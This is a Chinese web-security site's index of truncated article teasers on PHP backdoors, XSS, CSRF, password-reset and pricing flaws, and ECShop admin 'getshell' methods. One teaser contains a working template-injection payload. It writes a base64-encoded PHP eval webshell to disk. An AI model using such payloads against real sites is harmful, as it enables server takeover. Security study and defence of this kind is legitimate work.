PHP ob_start函数后门分析报告 - 网站安全 - 自学p关注热度:14

近日，根据日志宝分析平台的分析数据显示，部分网站的访问日志中存在大量命令执行类后门行为。我们与用户取得联系后拿到后门文件代码。此类后门通过PHP的ob_start()函数触发，利用..[详情]

怎么获取非开源网站系统的源代码 - 网站安全关注热度:14

一、 扯淡一段我们做渗透测试，需要的是什么？需要漏洞，漏洞是什么？漏洞是可以利用来获取我们想要得到的东西的途径，技术或是非技术的，但漏洞从何而来？分析，分析什么？分..[详情]

SDCM时代商城任意商品0元购 - 网站安全 - 自学p关注热度:10

可以在SDCM时代商城，任意金额购买任意物品。1、首先进入商城，购买任意商品，提交商品数量时抓包。可以将商品数量改为负数，成功提交：2、由于商品总的数量为0或者负数时，无法..[详情]

PHP安全性漫谈 - 网站安全 - 自学php关注热度:11

本文所讨论的安全性环境是在Linux+Apache+Mysql+PHP。超出此范围的安全性问题不在本文范畴之内。一、apache server安全性设置 1、以Nobody用户运行一般情况下，Apache是由Root 来安装和运行的。..[详情]

Mac's CMS 1.1.4多个缺陷及修复 - 网站安全 - 自学关注热度:14

############# 标题: Mac#39;s CMS - Multiple vilnerabilities# 作者: Yashar shahinzadeh# 开发者网站: http://macs-framework.sourceforge.net/# 测试环境: Linux Windows, PHP 5.3.4# .....[详情]

Short XSS - 网站安全 - 自学php关注热度:8

0x00 背景关键时候长度不够怎么办？在实际的情况中如果你不够长怎么办呢？看医生？吃药？做手术？。。。。。。。。。。。。。。算了，既然自身硬件不足，那么就把缺点变优点吧。..[详情]

Ecshop后台getshell-2(非模板，非sql) - 网站安全 - 自关注热度:23

后台可以编辑语言项，并且语言项中有部分是双引号，所以可以通过{${phpinfo()}}这种格式直接执行php代码，getshell!!(这里为了方便演示，使用phpinfo，实际情况可以换成一句话）语言文件有..[详情]

ECShop留言页面存储型XSS - 网站安全 - 自学php关注热度:11

回复的时候邮箱可以XSS247 {248 if (empty($_REQUEST[#39;parent_id#39;]))249 {250 $sql = INSERT INTO .$ecs-table(#39;feedback#39;). (msg_title, msg_time , user_.....[详情]

ecshop存储xss一枚，可打管理 - 网站安全 - 自学关注热度:13

说明一下啊 我下载的最新版本 而且打上了最新的所有补丁！你要再说是部分版本存在 我就要抓狂了啊！xss产生的位置includes/init.php 206行if (!isset($_SESSION[#39;user_id#39;])) { .....[详情]

ecshop后台拿weshell - 网站安全 - 自学php关注热度:16

模板管理--语言项编辑如:user.php 搜索:状态插入${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}}访问http://localhost/ecshop/languages/zh_cn/user.ph.....[详情]

ecshop一处设计缺陷可以被二次利用 - 网站安全关注热度:9

关于管理员密码那些事。本文前提 已经获得管理员密码的MD5！不知道从那个版本开始ec管理员密码加密方式发生了一些变化$ec_salt=rand(1,9999);md5(md5($pwd).$ec_salt;对于通过注入得到md5的兄弟..[详情]

新浪某站点修改任意用户密码 - 网站安全 - 自学关注热度:13

一、url未加密，导致能看到任意用户真实手机号码二、通过url可以在找回密码时换成任意手机号码找回三、登陆进去后，可以修改任何人的资料包括手机号码是房产网，信息很值钱的。..[详情]

Discuz X2和X2.5通用存储型xss - 网站安全 - 自学php关注热度:23

1、Discuz!X2版本在插入视频处构造跨站语句2、触发3、Discuz!X2.5版本同样的方式触发修复方案：过滤..[详情]

Ecshop csrf可劫持用户账号及修复 - 网站安全 - 自学关注热度:11

修改个人信息处未验证token，可通过一个精心构造的表单强制用户修改邮箱，达到劫持用户的目的，劫持用户账号只需要欺骗目标用户点击一个链接。form id=csrf action=http://127.0.0.1/ecshop/..[详情]

跨站请求伪造CSRF防护方法 - 网站安全 - 自学php关注热度:13

CSRF(Cross-site request forgery跨站请求伪造，也被称成为one click attack或者session riding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用。一、CSRF攻击原理CSRF攻击原理比较简单，如图1所示。..[详情]